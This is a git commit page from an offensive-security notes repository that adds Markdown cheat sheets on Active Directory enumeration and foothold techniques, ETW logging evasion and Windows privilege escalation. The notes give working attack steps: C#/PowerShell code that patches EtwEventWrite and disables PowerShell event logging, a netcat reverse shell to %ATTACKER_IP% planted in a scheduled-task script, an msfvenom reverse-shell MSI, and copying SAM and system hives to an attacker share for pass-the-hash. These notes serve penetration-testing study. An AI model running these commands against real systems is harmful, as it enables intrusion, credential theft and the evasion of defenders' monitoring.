whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2022-06-20 00:09:28 +02:00
parent 4427517c17
commit c613e1d12d
9 changed files with 507 additions and 4870 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -178,3 +178,6 @@
[submodule "hashes/namely"]
path = hashes/namely
url = https://github.com/OrielOrielOriel/namely
[submodule "misc/level3_hypervisor/kubeletctl"]
path = misc/level3_hypervisor/kubeletctl
url = https://github.com/cyberark/kubeletctl.git

117
misc/active_directory/ad_enumeration.md Normal file
View File

@ -0,0 +1,117 @@
# Enumerate Active Directory
Enumeration following after initial credentials are gained
## SYSVOL
* On windows use `runas` and gain local administrative permissions via
```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
* Query DNS, for example the DC
```sh
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
```sh
dir \\%HOSTNAME%\SYSVOL\
```
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
## Microsoft Management Console (MMC)
* Use AD Snap-ins of `Remote Server Administrative Tools`
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
* Start enumerating via click on the domain object in the tree on the left
* Take a look at `People` directory -> right click on them to see properties
* Change or create user or change groups
* Also use `MMC` to enumerate
## CMD enumeration
Execute from domain joined machine
* Users
```sh
net user /domain
```
* Specific user
```sh
net user <username> /domain
```
* Groups
```sh
net group /domain
```
* Specific group
```sh
net group <groupname> /domain
```
* Password Policy via accounts
```sh
net accounts /domain
```
## Powershell Cmdlets
* User details via
```sh
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
```
* Groups
```sh
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
```
* Group membership
```sh
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```
* Generic AD objects
```sh
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```
* Domains
```sh
Get-ADDomain -Server exampleDC.com
```
## Sharphound and Bloodhound
* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
* Change to AD user via `runas.exe` and collect via one of the following
* Sharphound.ps1
* sharphound.exe
* Azurehound.ps1
* For example
```sh
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
```
* After some time collect the current sessions via
```sh
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```
* Start neo4j db
```sh
neo4j console start
```
* Start bloodhound
```sh
bloodhound --no-sandbox
```
* Drag and Drop the zip file from Sharphound
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts
## LDAP
## PowerView
## WMI

115
misc/active_directory/gaining_foothold_AD.md Normal file
View File

@ -0,0 +1,115 @@
# Active Directory - Gain Foothold
* Methods of aquiring the first set of credentials
## Aquire credentials
### OSINT
* Discover info about the target via
* Questions asked on Stack Overflow
* Credentials set in (github) repos
* Past breaches, [haveIbeenpwned](https://haveibeenpwned.com/), [DeHashed](https://www.dehashed.com/)
### Phishing
* Gain credentials via eMail
## NTLM Authenticated Services
* Windows Authentication on NetNTLM is a Challenge-Response protocol used to deliver a challenge and the result on behalf of a user -- through the application -- to the DC
* These may be exposed to the Internet. For example
* Mail exchange, OWA webmail
* RDP
* VPN endpoints
* Web applications using something like SSO via AD
* Use these applications to either brute force / spraying passwords to found IDs or to verify previously aquired IDs and their passwords
## LDAP Bind Credentials
* LDAP may be integrated into an AD Forest. An application may verify an LDAP account with the help of AD credentials at the DC.
* Third party programs may use LDAP like
* CUPS
* VPNs
* gitlab
### LDAP Pass-Back
* After gaining access to a device's config including LDAP parameters, reroute its IP to your own IP. This may be done via web UIs.
* Use an LDAP server to catch the credentials. Only PLAIN and LOGIN authentication must be allowed in order to gain the credentials.
* OpenLDAP
```sh
dpkg-reconfigure -p low slapd
```
* Skip reconfiguration -> No
* Insert DNS domain and organisation
* Provide password
* Select `MDB` as database
* No removal when db is purged
* Move old database when creating a new one
* Downgrade authentication via `*.ldif` file
```sh
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
* Patch and reload ldap
```sh
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```
* Check via
```sh
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```
* Make pcap via tcdump
## Authentication Relay
* Communcating services inside the network verify authentication of each other
* Intercept NTLM hashes send for example via `SMB` auth, or do a MITM
* Use responder poisons requests gained from
* __Link-Local Multicast Name Resolution__ (LLMNR)
* __NetBIOS Name Server__ (NBT-NS), send before LLMNR
* __Web Proxy Auto-Discovery__ (WPAD), finds proxies for future HTTP connections
### Capture via responder
* Run responder on LAN via
```sh
sudo responder -I <interface>
```
* Use `hashcat` to crack the hashes
```sh
hashcat -m 5600 hash.txt rockyout.txt --force
```
### Relay via responder
* `SMB` signing must not be enforced, either on or off
* Done after some intial enumeration and to gain administrative accounts
## Microsoft Deployment Toolkit (MDT)
* Deploy and patch software remotely
* Used in conjuction with Microsoft's System Center Configuration Manager (SCCM)
### Preboot Execution Environment (PXE)
* [Read this](https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/)
* Load and install OS via network
* `MDT` provisions PXE boot images
* An IP gained via `DHCP` is the validation step, PXE will be delivered by `MDT`
* Retrieve/enumerate images via `TFTP`
* Create an admin account after OS installation
* Password scraping to recover AD creds used during OS installation
* Use `PowerPXE.ps1` to extract `*.bcd` files
## Configuration Files
* Configurations of services and applications as well as registry keys
* Use enumeration scripts like `winpeas.sh` or `seatbelt`

1
misc/level3_hypervisor/kubeletctl Submodule

@ -0,0 +1 @@
Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20

8
misc/level3_hypervisor/kubernetes.md
View File

@ -1,5 +1,7 @@
# Kubernetes
* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well
## Account Token
* Snatch an account token from inside a pod
* Use it via kubectl, watch out for authorizations and namespaces
@ -32,8 +34,8 @@ metadata:
name: attacking-pod
spec:
containers:
- image: <imageName>
name: host
- image: <image name in found containers section>
name: <name of image in found containers section>
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
@ -52,5 +54,5 @@ kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET
```
* Run an interactive session on the pod
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bassh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
```

96
post_exploitation/docs/windows/evade_event_tracing.md Normal file
View File

@ -0,0 +1,96 @@
# Evade Event Tracing (ETW)
* Event Logging
* Trace Logging
* Event IDs are used
* __Event Provider__ generate events
* Managed Object Format, enabled by a single trace session
* Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
* Manifest Based, up to 8 trace sessions
* TraceLogging, up to 8 trace sessions
* __Event Controller__ build and configure sessions for events
* __Event Consumer__ interpret events, parses sessions of selected providers
* XML data
## Log Evasion
* Deleting logs is tracked by an event ID as well . Do not do it!
* ID 1102, security audit logs cleared
* ID 104, log file cleared
* ID 1100, even service shut down
### Techniques
* Provider
* [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
* Set `m_enabled` to `$null` via powershell script
```sh
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```
* Group policy takeover
* Loaded in the same security context as the user
* GPO providers are script block logging and module logging
* Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
* Administrative Templates -> Windows Components -> Windows PowerShell
* Log pipeline abuse
* `LogPipelineExecutionDetails` has to be set to false
* Type creation
* Controller
* Patching EtwEventWrite stored in `ntdll.dll` via return value modification
```sh
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
```
* Modify memory permissions
```c
uint oldProtect;
Win32.VirtualProtect(
etwFunction,
(UIntPtr)patch.Length,
0x40,
out oldProtect
);
```
* Copy via `Marshal.Copy`
```c
patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
patch,
0,
etwEventSend,
patch.Length
);
```
* Clean up
```c
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
```
* Check patched instruction
```c
Win32.FlushInstructionCache(
etwFunction,
NULL
);
```
* Runtime Trace Tampering
* Consumer
* Log smashing
* Log tampering

173
post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
View File

@ -4,14 +4,18 @@
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)
## Account Types
* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__
* __System__, local system, final escalation
* __Local Service__, got anonymous connections over network.
* __Network Service__, default service account, authentication via network
## Enumeration
### Users & Groups
@ -26,6 +30,7 @@ qwinsta
```
### Files
* [powershell](../../../../enumeration/windows/powershell.md)
### System
@ -57,10 +62,12 @@ wmic service list brief | findstr "Running"
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
### Schedules Tasks
* `schtasks`
* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
* `Autoruns64.exe`
### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
### Search for Credentials
@ -89,6 +96,21 @@ accesschk64 -wvu "file.exe"
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
#### accesschk64 for Services
```sh
accesschk64 -qlc "service.exe"
```
* If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell
```sh
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
```
* Reconfigure and restart service
```sh
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
```
### Startup Application
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
@ -100,3 +122,148 @@ set srvport 7777
set uripath pass
```
* Visit site on target
### Unattended Windows Installation
* Investigate the following paths to potentially find user credentials
```sh
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
* Watch out for the `<Credentials>` tags
### Powershell History file
```sh
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```
### Internet Information Services (IIS)
* Default web server on windows
* Paths containing credentials are the following
```sh
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```
### Putty
* Saved proxy password credentials may be found via
```sh
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
```
### schtask and icacls
* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
* Check script for scheduled tasks, `F` means full access
```sh
icacls <PathToScript>
```
* Put payload inside the script
```sh
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
```
* Run the task
```sh
schtasks /run /tn <taskname>
```
### Always Installs Elevated
* These should be set
```sh
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```
* Craft `*.msi` file with a payload
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
```
* Upload and execute via
```sh
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
```
### Service Misconfiguration
* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`
```sh
sc qc apphostsvc
```
* Check found permissions via
```sh
icacls <BINARY_PATH_NAME>
```
* If the service binary path is writeable move the payload to its path and grant permissions
```sh
icacls <Payload_Service.exe> /grant Everyone:F
```
```sh
sc stop <service>
sc start <service>
```
* Catch the reverse shell service
Others ways are:
* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`
### Unquoted Service Path
* If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
* A created directory at install time inherits the permissions from its parent. Check it via
```sh
icacls <directory>
```
* Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
* Set permissions
```sh
icacls C:\Path/to/service.exe /grant Everyone:F
```
### Permissions
* [priv2admin](https://github.com/gtworek/Priv2Admin)
* `whoami /priv`
#### SeBackup / Restore
* If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
* Download `SAM` and `System` hashes
```sh
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam C:\Windows\Temp\sam.hive
```
* Start smb server on attack machine
```sh
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
```
* Dump the hashes
```sh
secretsdump.py -sam sam.hive -system system.hive LOCAL
```
* Use pass the hash to login
```sh
psexec.py -hashes <hash> administrator@$TARGET_IP
```
#### SeTakeOwnership
* If `SeTakeOwnership` is set one can take ownership of every file or service.
```sh
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe
```
* Log out, on the Login screen click on `Ease of Access`
#### SeImpersonate / SeAssignPrimaryToken
* Execute process as another user

212
post_exploitation/priv_esc/privesc-scripts/rem.json
View File

@ -1,212 +0,0 @@
[
{
"exit_code": 0,
"node_version": "14.15.4",
"versioning": null,
"version": "1.0.0",
"unstable_restarts": 0,
"restart_time": 1,
"created_at": 1611502382040,
"axm_dynamic": {},
"axm_options": {
"error": true,
"heapdump": true,
"feature.profiler.heapsnapshot": false,
"feature.profiler.heapsampling": true,
"feature.profiler.cpu_js": true,
"latency": true,
"catchExceptions": true,
"profiling": true,
"metrics": {
"http": true,
"runtime": true,
"eventLoop": true,
"network": false,
"v8": true
},
"standalone": false,
"tracing": {
"outbound": false,
"enabled": false
},
"module_conf": {},
"apm": {
"version": "4.3.5",
"type": "node"
},
"module_name": "server",
"module_version": "4.5.1"
},
"axm_monitor": {
"Heap Size": {
"value": "13.46",
"type": "internal/v8/heap/total",
"unit": "MiB",
"historic": true
},
"Heap Usage": {
"value": 87.5,
"type": "internal/v8/heap/usage",
"unit": "%",
"historic": true
},
"Used Heap Size": {
"value": "11.78",
"type": "internal/v8/heap/used",
"unit": "MiB",
"historic": true
},
"Active requests": {
"value": 0,
"type": "internal/libuv/requests",
"historic": true
},
"Active handles": {
"value": 4,
"type": "internal/libuv/handles",
"historic": true
},
"Event Loop Latency": {
"value": "0.47",
"type": "internal/libuv/latency/p50",
"unit": "ms",
"historic": true
},
"Event Loop Latency p95": {
"value": "4.49",
"type": "internal/libuv/latency/p95",
"unit": "ms",
"historic": true
},
"HTTP Mean Latency": {
"value": 16,
"type": "internal/http/builtin/latency/p50",
"unit": "ms",
"historic": true
},
"HTTP P95 Latency": {
"value": 1421.6999999999985,
"type": "internal/http/builtin/latency/p95",
"unit": "ms",
"historic": true
},
"HTTP": {
"value": 0.17,
"type": "internal/http/builtin/reqs",
"unit": "req/min",
"historic": true
}
},
"axm_actions": [
{
"action_name": "km:heapdump",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:cpu:profiling:start",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:cpu:profiling:stop",
"action_type": "internal",
"arity": 1
},
{
"action_name": "km:heap:sampling:start",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:heap:sampling:stop",
"action_type": "internal",
"arity": 1
}
],
"pm_uptime": 1611502382185,
"status": "online",
"unique_id": "1ffec2ab-685a-4046-85de-afd3cd6008ea",
"PM2_HOME": "/home/www/.pm2",
"LS_COLORS": "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"LANG": "en_US.UTF-8",
"DISPLAY": ":0",
"SUDO_GID": "1000",
"COLORTERM": "truecolor",
"USERNAME": "root",
"SUDO_COMMAND": "/bin/su",
"USER": "www",
"PWD": "/home/www/VulnNet-Node",
"HOME": "/home/www",
"SUDO_USER": "serv-manage",
"SUDO_UID": "1000",
"MAIL": "/var/mail/www",
"TERM": "xterm-256color",
"SHELL": "/bin/bash",
"SHLVL": "2",
"LANGUAGE": "en_US",
"LOGNAME": "www",
"XAUTHORITY": "/home/serv-manage/.Xauthority",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"_": "/usr/bin/pm2",
"OLDPWD": "/home/www",
"PM2_USAGE": "CLI",
"NODE_APP_INSTANCE": 0,
"vizion_running": false,
"km_link": false,
"pm_pid_path": "/home/www/.pm2/pids/server-0.pid",
"pm_err_log_path": "/home/www/.pm2/logs/server-error.log",
"pm_out_log_path": "/home/www/.pm2/logs/server-out.log",
"exec_mode": "fork_mode",
"exec_interpreter": "node",
"pm_cwd": "/home/www/VulnNet-Node",
"pm_exec_path": "/home/www/VulnNet-Node/server.js",
"node_args": [],
"name": "server",
"filter_env": [],
"namespace": "default",
"env": {
"unique_id": "1ffec2ab-685a-4046-85de-afd3cd6008ea",
"server": {},
"PM2_HOME": "/home/www/.pm2",
"LS_COLORS": "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"LANG": "en_US.UTF-8",
"DISPLAY": ":0",
"SUDO_GID": "1000",
"COLORTERM": "truecolor",
"USERNAME": "root",
"SUDO_COMMAND": "/bin/su",
"USER": "www",
"PWD": "/home/www/VulnNet-Node",
"HOME": "/home/www",
"SUDO_USER": "serv-manage",
"SUDO_UID": "1000",
"MAIL": "/var/mail/www",
"TERM": "xterm-256color",
"SHELL": "/bin/bash",
"SHLVL": "2",
"LANGUAGE": "en_US",
"LOGNAME": "www",
"XAUTHORITY": "/home/serv-manage/.Xauthority",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"_": "/usr/bin/pm2",
"OLDPWD": "/home/www",
"PM2_USAGE": "CLI"
},
"merge_logs": true,
"vizion": true,
"autorestart": true,
"watch": false,
"instance_var": "NODE_APP_INSTANCE",
"pmx": true,
"automation": true,
"treekill": true,
"username": "www",
"windowsHide": true,
"kill_retry_time": 100
}
]

4652
post_exploitation/priv_esc/privesc-scripts/smokey@10.10.157.16
View File

File diff suppressed because one or more lines are too long